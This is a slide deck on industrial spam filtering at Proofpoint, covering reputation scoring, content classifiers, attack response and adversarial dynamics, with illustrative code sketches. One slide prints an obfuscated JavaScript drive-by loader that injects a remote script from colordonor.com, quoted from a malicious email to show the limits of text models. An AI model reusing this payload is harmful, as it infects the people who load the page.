Email filtering: A view from the inside. Tom Fawcett Machine Learning Architect Proofpoint, Inc. tfawcett@acm.org





Typical data mining view of spam filtering
- Email corpus (ham + spam)
- Content extraction, pre-processing
- Bag-of-words representation
- Induction algorithm: support vector machines, random forests, ensemble methods, etc.
- Two-class model
- Test set, cross-validation
- 99% accuracy! Spam filtering is easy!
Sample message:
From: "Latasha Gunter" <2nlni7jkcv2@audit.net>
To: Tom Fawcett <tfawcett@acm.org>
Subject: its been p r o v e n l qnvyvrnpztc
100% Guaranteed to Work! Our Male Enlargement Pill is the most effective on the medical market today with over a Million satisfied customers worldwide!
[Figure: stacked bag-of-words vectors with per-message counts for terms such as "the", "male", "pill", "medical", "market"]
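As a rough illustration of the bag-of-words step above, the sketch below counts lower-cased word tokens in the sample message body. The tokenizer (letters only, split on everything else) and the function name `bag_of_words` are assumptions made for this example, not the pre-processing used in any production filter.

```python
import re
from collections import Counter

def bag_of_words(text: str) -> Counter:
    """Lower-case the text and count runs of letters as tokens (assumed tokenizer)."""
    tokens = re.findall(r"[a-z]+", text.lower())
    return Counter(tokens)

# Body of the sample message from the slide.
body = ("Our Male Enlargement Pill is the most effective on the medical "
        "market today with over a Million satisfied customers worldwide!")

counts = bag_of_words(body)
print(counts["the"], counts["pill"], counts["market"])
```

Word order, headers, and markup are all discarded by this representation, which is part of why the "easy" view breaks down on real mail.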

Real spam filtering is tough
- Huge proportion of email is spam (> 90% at some sites).
- Heterogeneous email stream. (Proofpoint has thousands of customers: different languages, different countries, different topics.)
- Not just text. Virtually infinite representation space: text, HTML, JavaScript, images.
- Types of errors are different and important.
- Strict performance requirements (service agreement: 1 FP in 350K messages).
- Demanding processing requirements (100-200K messages/hr/appliance).
- Fundamental noise: spam looks like bulk, spam looks like ham, phishing looks like ham; ham looks like spam.
- Words aren't enough: not enough information.
- Constantly changing: spam campaigns come and go.
- Constantly changing: intelligent, adaptive adversaries.
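A quick back-of-the-envelope calculation shows how far "99% accuracy" is from the service agreement quoted above. The sketch assumes the 1-in-350K figure is counted over all scanned messages and that exactly 90% of the stream is spam; both are assumptions for illustration only.

```python
def expected_errors(messages: int, accuracy: float) -> float:
    """Expected number of misclassified messages at a given overall accuracy."""
    return messages * (1.0 - accuracy)

MESSAGES = 350_000          # window named in the service agreement
SPAM_PERCENT = 90           # assumed share of spam in the stream

# A "99% accurate" classifier still makes thousands of errors in that window.
errors_at_99 = expected_errors(MESSAGES, 0.99)

# Only ham can become a false positive, so the budget of one FP
# has to be met on the (assumed) 10% of traffic that is legitimate.
ham_messages = MESSAGES * (100 - SPAM_PERCENT) // 100
max_fp_rate_on_ham = 1 / ham_messages

print(round(errors_at_99), ham_messages, max_fp_rate_on_ham)
```

Under these assumptions the allowed false positive rate on legitimate mail is on the order of a few in 100,000, which is why accuracy alone says little about whether a filter is usable.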

Real spam filtering is tough (cont'd)
- Need for fast response. As soon as we see an attack, our customers see it too.
- Classification process must be transparent. Human analysts must explain, analyze and correct spam decisions. Models must be white-box and understandable.
- Strict privacy concerns. We scan everything, but we can't keep it.

Types of data mining environments
- Static (data mining): fixed patterns, fixed model. If the data source is a stream, the series is stationary.
- Dynamic: concept drift; non-stationary streams. The concept is a set of disjuncts; have to decide when one is changing and how to adjust the model(s).
- Adversarial: feedback loop with the environment. Drifting concept, driven by an adversary who is actively trying to defeat the model. Interacting complex adaptive systems (some chaotic dynamics). Economics, game theory, complex systems theory.

Adversarial domains are everywhere
Valuable asset + intelligent agents + large playing field = ARMS RACE
- Cellphone fraud / detection
- Blog spam, tweet spam
- Credit card fraud / detection
- Advertising / ad blocking
- Cracking / intrusion detection
- CAPTCHAs / CAPTCHA breaking
- Email (spam) / filtering
- Viruses / antivirus products
- Click fraud
- Phishing / detection
- Games
- Product review spam / detection & culling
- User tracking technology / privacy guards
- Music sharing / torrent poison
The nature of the game and the agents' intelligence determine the dynamics.

Types of email we distinguish
Some terminology:
- Bulk email. Like spam but desired and (presumably) requested.
- Spam (unsolicited commercial email).
- Viruses (attachments and drive-by downloads).
- Phishing (representing a legit sender, to get the recipient to divulge sensitive information).
The last three are all treated as spam.
Legit email = ham = negative class (not a threat)
Illegit email = spam = positive class (threat, alarm)
So the errors are:
- False positives = false alarms (legit email thrown away)
- False negatives = spam that got through the filters
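With spam as the positive class, the two error types defined above can be counted directly from true and predicted labels. This is a minimal sketch; the label strings "ham" and "spam" and the function name are choices made for the example.

```python
def error_counts(y_true, y_pred):
    """Return (false_positives, false_negatives) with spam as the positive class."""
    # False positive: legit mail (ham) flagged as spam, i.e. a false alarm.
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == "ham" and p == "spam")
    # False negative: spam that was labeled ham and got through the filter.
    fn = sum(1 for t, p in zip(y_true, y_pred) if t == "spam" and p == "ham")
    return fp, fn

truth     = ["ham", "spam", "spam", "ham", "spam"]
predicted = ["ham", "spam", "ham",  "spam", "spam"]
fp, fn = error_counts(truth, predicted)
print(fp, fn)
```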

Where we get (training) data
- Historical (static) collections of ham and spam.
- Spamtraps: machines on the internet that receive no legitimate email. (Source of 100% spam.)
- Honeypoints: addresses on customer machines that receive only spam. (Source of 100% spam.)
- False positives and false negatives reported by customers.

Spamtraps

Email transmission process (dialog)
Participants: inbound sender; mail host (MTA), responsible for filtering and delivery.
HELO relay.example.org
250 Hello relay.example.org, glad to meet you
MAIL FROM:<bob@example.org>
250 Ok
RCPT TO:<alice@example.com>
RCPT TO:<theboss@example.com>
250 Ok
TEXT
Return-Path: bounce@inbound.teach12.net
Received: from imta31.westchester.pa.mail.comcast.net (LHLO imta31.westchester.pa.mail.comcast.net) (76.96.59.249) by sz0150.ev.mail.comcast.net with LMTP; Thu, 21 Oct 2010 16:29:53 +0000 (UTC)
Received: from ttcmailer01.teach12.net ([63.146.114.254]) by imta31.westchester.pa.mail.comcast.net with comcast id MUV31f0055VPXW70XUVSzl; Thu, 21 Oct 2010 16:29:54
Date: Thu, 21 Oct 2010 12:26:43 -0400
To: tom.fawcett@comcast.net
From: "The Teaching Company" <teaching_company@teach12.net>
...
You have received this email because you are a valued Teaching Company customer. Your email address is never rented, sold, or loaned to anyone else.
...
250 Ok

Email components: what we have to work with
HELO relay.example.org
  (Machine name and IP address of immediate upstream server.)
MAIL FROM:<bob@example.org>
  (Return address; probably forged if spam.)
RCPT TO:<alice@example.com>
RCPT TO:<theboss@example.com>
  (Recipients.)
Mail body. Any portion can be forged.
Return-Path: bounce@inbound.teach12.net
Received: from imta31.westchester.pa.mail.comcast.net (LHLO imta31.westchester.pa.mail.comcast.net) (76.96.59.249) by sz0150.ev.mail.comcast.net with LMTP; Thu, 21 Oct 2010 16:29:53 +0000 (UTC)
Received: from ttcmailer01.teach12.net ([63.146.114.254]) by imta31.westchester.pa.mail.comcast.net with comcast id MUV31f0055VPXW70XUVSzl; Thu, 21 Oct 2010 16:29:54
  (Received lines, presumably indicating where the message has been and how it's been routed. Often forged in spam.)
Date: Thu, 21 Oct 2010 12:26:43 -0400
To: tom.fawcett@comcast.net
From: "The Teaching Company" <teaching_company@teach12.net>
  (Sender + recipient.)
...
You have received this email because you are a valued Teaching Company customer. Your email address is never rented, sold, or loaned to anyone else.
...
  (Body. Text, HTML, etc.)
Also: attachments. Zero or more.
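The header components listed above can be pulled apart with Python's standard `email` package. The sketch below uses an abbreviated copy of the slide's headers (trace details and timestamps are dropped for brevity) and a simple regular expression for dotted IPv4 addresses; the helper name `relay_ips` is made up for this example, and nothing here checks whether a header was forged.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Abbreviated version of the example headers; each header kept on one line.
RAW = (
    "Return-Path: bounce@inbound.teach12.net\n"
    "Received: from imta31.westchester.pa.mail.comcast.net (76.96.59.249)"
    " by sz0150.ev.mail.comcast.net with LMTP\n"
    "Received: from ttcmailer01.teach12.net ([63.146.114.254])"
    " by imta31.westchester.pa.mail.comcast.net\n"
    "To: tom.fawcett@comcast.net\n"
    'From: "The Teaching Company" <teaching_company@teach12.net>\n'
    "\n"
    "You have received this email because you are a valued customer.\n"
)

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

def relay_ips(msg):
    """Return the first IPv4 address found in each Received header, top to bottom."""
    ips = []
    for header in msg.get_all("Received", []):
        match = IPV4.search(header)
        if match:
            ips.append(match.group(0))
    return ips

msg = message_from_string(RAW)
ips = relay_ips(msg)
display_name, from_addr = parseaddr(msg["From"])
print(ips, display_name, from_addr)
```

Because any of these fields can be forged by the sender, values extracted this way are evidence to be scored, not facts.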

Email scanning process - overview
Inbound email connection. Sample message (truncated on the slide):
Delivered-To: em-ca-bruceg@em.ca
Received: (qmail 4406 invoked from n1
Received: from dunwoody-dobson.ie () by churchill.factcomp.com ([24.89.90]) with ESMTP via TCP; 01 Dec 2009 1
From: "Lyles X Alisa" <Crosbyxjtovbgw>
To: henrietta96@aol.com
Cc: amvimdypet@fufutmadje.comt
Return-Path: Crosbyxjtovbgw@mailpro
Here's what we're for this week:
Utility-based classification: general increase in cost / decrease in utility as a message moves through the stages.
Stages in the diagram:
- IP (connection) scoring
- Header extraction, domain (URL) extraction, content parsing
- Domain reputation/scoring, SNA, content scoring
Outcomes: Reject (three exit points in the diagram) or Deliver.

IP (sender) scoring
Reputation model: who's sending this email?
- Every inbound sender's IP address is evaluated.
- Internal factors: who in our network is getting email from this IP? How much email? How much spam? etc.
- External factors: how long has this IP been around? What subnet/country? Who is it registered to?
- Factors are quantified and provided to a classifier.
- Classifier has several actions: Accept, Reject, Throttle, Discard.
- Statistics are updated quickly and shared.
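To make the idea of mapping sender statistics to an action concrete, here is a deliberately simplified sketch. The fields, the thresholds, and the rule-based decision are all hypothetical stand-ins invented for this example; the slides describe a trained classifier whose inputs and decision boundaries are not given, and the Discard action is left out because its criteria are not described.

```python
from dataclasses import dataclass

@dataclass
class SenderStats:
    messages: int   # messages seen from this IP across the network (hypothetical field)
    spam: int       # how many of those were judged spam (hypothetical field)
    age_days: int   # how long this IP has been observed (hypothetical field)

def choose_action(s: SenderStats) -> str:
    """Pick an action from simple, made-up thresholds on spam ratio and age."""
    if s.messages == 0:
        return "throttle"            # nothing known yet: slow the sender down
    spam_ratio = s.spam / s.messages
    if spam_ratio >= 0.95:
        return "reject"              # almost everything from this IP is spam
    if spam_ratio >= 0.50 or s.age_days < 7:
        return "throttle"            # suspicious or very new sender
    return "accept"

print(choose_action(SenderStats(messages=1000, spam=990, age_days=30)))
```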

Domain (URL) scoring
What are they pointing back to?
- URL classification is critical. URLs are how most spammers provide links to their wares (Click <A HREF=... >HERE</A> to buy!).
- Every URL is extracted from each email message and evaluated.
- URLs are evaluated similarly to IPs but with slightly different criteria, e.g. who registered this domain and for how long, who the name server is, etc.
- A classifier is used to condemn URLs, which in turn can cause an email to be rejected.
- Spammers know URLs are watched, so they use public resources: Google Groups, bit.ly, etc.
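The extraction step can be sketched with the standard library alone: parse the HTML, collect `href` and `src` attribute values, and reduce each to its host name for reputation lookup. The class and function names are invented for this example, the example domains are placeholders, and a real extractor would also have to handle plain-text URLs, redirects, and obfuscation.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class LinkExtractor(HTMLParser):
    """Collect href/src attribute values from every tag in an HTML body."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.urls.append(value)

def extract_domains(html: str):
    """Return the sorted set of host names linked from the HTML."""
    parser = LinkExtractor()
    parser.feed(html)
    hosts = {urlparse(u).hostname for u in parser.urls}
    return sorted(h for h in hosts if h)

html = ('Click <A HREF="http://shop.example.com/buy?id=1">HERE</A> to buy! '
        '<img src="http://img.example.net/x.gif">')
domains = extract_domains(html)
print(domains)
```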

Content scoring
- Regular expression parsing (SpamAssassin rules + Proofpoint rule set).
- Very large lexicon (~1 million entries): words, phrases, URLs.
- Rules and terms trained by modified logistic regression: binomial assumption, normalized score.
- Inputs to LR (~300K): words, phrases, regexps.
- In use, produces a score between 0 and 100.
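The shape of such a scorer can be sketched with ordinary logistic regression: sum the weights of the lexicon entries that fire on a message, pass the sum through the logistic function, and scale to 0-100. The slides do not spell out the "modified" variant, so this is plain logistic scoring with made-up weights, not the production model.

```python
import math

def content_score(features, weights, bias=0.0):
    """Score a message in [0, 100] from the lexicon entries that matched it."""
    # Linear part: bias plus the weight of every matched entry (unknown entries add 0).
    z = bias + sum(weights.get(f, 0.0) for f in features)
    # Logistic function maps the sum to (0, 1); scale to a 0-100 score.
    return 100.0 / (1.0 + math.exp(-z))

# Hypothetical lexicon weights: positive leans spam, negative leans ham.
WEIGHTS = {"enlargement": 2.5, "guaranteed": 1.2, "meeting": -1.8, "agenda": -1.1}

spammy = content_score({"enlargement", "guaranteed"}, WEIGHTS)
hammy = content_score({"meeting", "agenda"}, WEIGHTS)
neutral = content_score(set(), WEIGHTS)
print(round(spammy, 1), round(hammy, 1), neutral)
```

A linear model of this kind stays inspectable: an analyst can read off which entries pushed a score up or down and adjust individual weights.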

(Why use simple classifiers?)
- Needs to be explainable, modifiable.
- Representation can (should?) incorporate many attribute interactions. Empirically unnecessary (R² ≈ 0.95): no advantage from more complex models.
- Need for space and time efficiency.

Disjuncts of a spam stream
[Figure: spam term frequency chi-squared tests per week of 2002]
1: Relatively stable/static
2: Seasonal/periodic
3: Episodic spiking
From "In vivo" spam filtering: A challenge problem for data mining. Tom Fawcett, KDD Explorations vol.5 no.2, December 2003.
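One way to run a per-week chi-squared test on a term is to build a 2x2 table (messages with and without the term, in the week of interest versus a reference period) and compute the Pearson statistic. The exact test setup behind the figure is not given in the slides, so the table layout and the counts below are assumptions for illustration.

```python
def chi_squared_2x2(a: int, b: int, c: int, d: int) -> float:
    """Pearson chi-squared statistic for the 2x2 table [[a, b], [c, d]].

    a: messages in the week containing the term
    b: messages in the week without the term
    c: reference messages containing the term
    d: reference messages without the term
    """
    n = a + b + c + d
    denom = (a + b) * (c + d) * (a + c) * (b + d)
    if denom == 0:
        return 0.0  # degenerate table: no evidence either way
    return n * (a * d - b * c) ** 2 / denom

# Made-up counts: the term appears in 30% of this week's spam vs 10% before.
spike = chi_squared_2x2(30, 70, 10, 90)
stable = chi_squared_2x2(10, 90, 10, 90)
print(spike, stable)
```

A large statistic for a given week flags a term whose frequency has shifted, which is how stable, seasonal, and spiking terms can be told apart over a year of data.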

Data mining classifier update cycles
- Main cycles: lexicon consolidation, weight training, etc. Every 24 hrs.
- Fast attack response: new attacks are examined and the lexicon is updated. ~15 min cycles.

Fast attack learning & response
NB: Primary change is to representation, not to model.
1. A dip in TP rate on a spamtrap signifies an attack that is not being handled by the classifier.
2. False negatives (low-scoring spam messages) are downloaded from spamtraps.
3. Messages are parsed and dissected (URL, email extraction, etc.).
4. Messages are clustered by text contents.
5. In consultation with the lexicon, characteristic terms are extracted from clusters (e.g. "good cheap Canadian meds", "lowest mortgage rates in years").
6. New lexicon entries are pushed out to customer sites, along with weight estimates, to be integrated into the classifier.
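The clustering and term-extraction steps can be sketched as follows, assuming a greedy single-pass clustering on Jaccard similarity of token sets and a simple "appears in most of the cluster and is not yet in the lexicon" rule. Both choices, the thresholds, and the function names are illustrative assumptions; the slides do not say which clustering method or extraction rule is used.

```python
import re
from collections import Counter

def tokens(text):
    """Set of lower-cased word tokens in a message."""
    return set(re.findall(r"[a-z]+", text.lower()))

def jaccard(a, b):
    """Jaccard similarity of two token sets."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0

def cluster(messages, threshold=0.5):
    """Greedy clustering: join the first cluster whose seed is similar enough."""
    clusters = []
    for msg in messages:
        toks = tokens(msg)
        for members in clusters:
            if jaccard(toks, members[0]) >= threshold:
                members.append(toks)
                break
        else:
            clusters.append([toks])
    return clusters

def new_terms(members, lexicon, min_share=0.8):
    """Terms present in at least min_share of a cluster and absent from the lexicon."""
    counts = Counter(t for toks in members for t in toks)
    needed = min_share * len(members)
    return sorted(t for t, n in counts.items() if n >= needed and t not in lexicon)

missed_spam = [
    "good cheap Canadian meds today",
    "good cheap Canadian meds now",
    "lowest mortgage rates in years",
]
clusters = cluster(missed_spam)
candidates = new_terms(clusters[0], lexicon={"good", "cheap"})
print(len(clusters), candidates)
```

Note that the output is a set of new representation entries rather than a retrained model, in line with the slide's remark that the primary change is to the representation.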

Text models aren't enough
- Intentional mis-spelling (V1a.gr@, ViaggrA, C1ALYS, etc.)
- Inherent overlap/noise (CIALYS)
- The difference is often intention: Did you request this info? Do you want this ad?
- Too easy to get around text!
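A common first defence against intentional mis-spelling is to normalize tokens before lexicon lookup. The sketch below maps a few look-alike characters to letters, strips punctuation, and collapses repeated letters; the substitution table is a small assumed sample, and the same normalization would have to be applied to lexicon entries. It also shows the limits of the approach: each new trick needs a new rule.

```python
import re

# Assumed look-alike substitutions; real obfuscation uses many more.
LOOKALIKES = str.maketrans({"1": "i", "0": "o", "3": "e", "@": "a", "$": "s"})

def normalize(token: str) -> str:
    """Reduce an obfuscated token to a canonical lower-case letter string."""
    t = token.lower().translate(LOOKALIKES)
    t = re.sub(r"[^a-z]", "", t)        # drop dots, dashes and other filler
    t = re.sub(r"(.)\1+", r"\1", t)     # collapse runs of the same letter
    return t

for raw in ("V1a.gr@", "ViaggrA", "C1ALYS"):
    print(raw, "->", normalize(raw))
```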


Text models aren't enough
On your screen: the rendered message.
Source:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/tr/html4/strict.dtd">
<html> <head> </head> <body>
<table border="0" cellpadding="0" cellspacing="0" width="600"> <tbody> <tr>
<td bgcolor="#999999" width="1"><img src="http://graphics.nytimes.com/images/misc/spacer.gif" border="0" height="1" width="1"></td>
<td width="1"><img src="http://graphics.nytimes.com/images/misc/spacer.gif" border="0" height="1" width="1"></td>
<td width="598"> <table border="0" cellpadding="0" cellspacing="0" width="598"> <tbody>
Rendering etc. ...
Behind the scenes:
<script type="text/javascript">
<!--
var s="=tdsjqu!tsd>#iuuq;00dpmpsepops/dpn0jgsbnfgjmf/kt#?=0tdsjqu?"; m="";
for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1);
document.write(m);
//-->
The script shifts every character of s down by one and writes the result into the page:
<script src="http://colordonor.com/iframefile.js"></script>
You're infected.
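The obfuscation in the script above is a one-character shift, which is easy to reproduce offline without executing any JavaScript. This sketch applies the same transformation in Python to the string from the slide; the function name is chosen for the example.

```python
def decode_shifted(s: str, shift: int = 1) -> str:
    """Undo the obfuscation by subtracting `shift` from each character code."""
    return "".join(chr(ord(ch) - shift) for ch in s)

# The string literal assigned to `s` in the slide's script.
encoded = '=tdsjqu!tsd>#iuuq;00dpmpsepops/dpn0jgsbnfgjmf/kt#?=0tdsjqu?'
decoded = decode_shifted(encoded)
print(decoded)
```

A text model looking at the raw source sees only the scrambled string, so the malicious URL never appears as a token unless the filter decodes or emulates the script.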

Network effects: Cell phone fraud
- Dialed digits detector: network connections can be used to classify/identify people.
- Fraud detection: how closely does a pattern match a known fraudulent one?
- Anomaly detection: how different is a pattern from a known legit one?
[Figure: calling patterns labeled "Fraudulent!", "Fraudulent", and "Fraudulent or legit?"]
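The two questions above can be phrased as two scores over sets of dialed numbers: similarity to the closest known fraudulent pattern, and distance from the account's own legitimate profile. Jaccard similarity over number sets is an assumption made for this sketch, as are the function names and the shortened example numbers.

```python
def jaccard(a: set, b: set) -> float:
    """Jaccard similarity of two sets of dialed numbers."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0

def fraud_score(pattern: set, known_fraud: list) -> float:
    """Fraud detection: how closely does the pattern match a known fraudulent one?"""
    return max((jaccard(pattern, f) for f in known_fraud), default=0.0)

def anomaly_score(pattern: set, legit_profile: set) -> float:
    """Anomaly detection: how different is the pattern from the known legit one?"""
    return 1.0 - jaccard(pattern, legit_profile)

# Hypothetical data: numbers previously dialed by a fraudster and by the real owner.
known_fraud = [{"555-0101", "555-0102", "555-0103"}]
legit_profile = {"555-0200", "555-0201", "555-0202"}
todays_calls = {"555-0101", "555-0102", "555-0200"}

f_score = fraud_score(todays_calls, known_fraud)
a_score = anomaly_score(todays_calls, legit_profile)
print(f_score, a_score)
```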

Link mining and network analysis
Link mining may be used to identify spam by p(spam | a,b,c,d):
- Identifying anomalous, low-probability links between recipients (spoofed names, compromised accounts, etc.).
- Identifying anomalous links between individuals in organizations.
- Identifying known bad email addresses and the messages that link to them.
- Linking IPs with countries, subnets; domains with nameservers, etc.
[Figure labels: NS, IP1, IP2]

[End]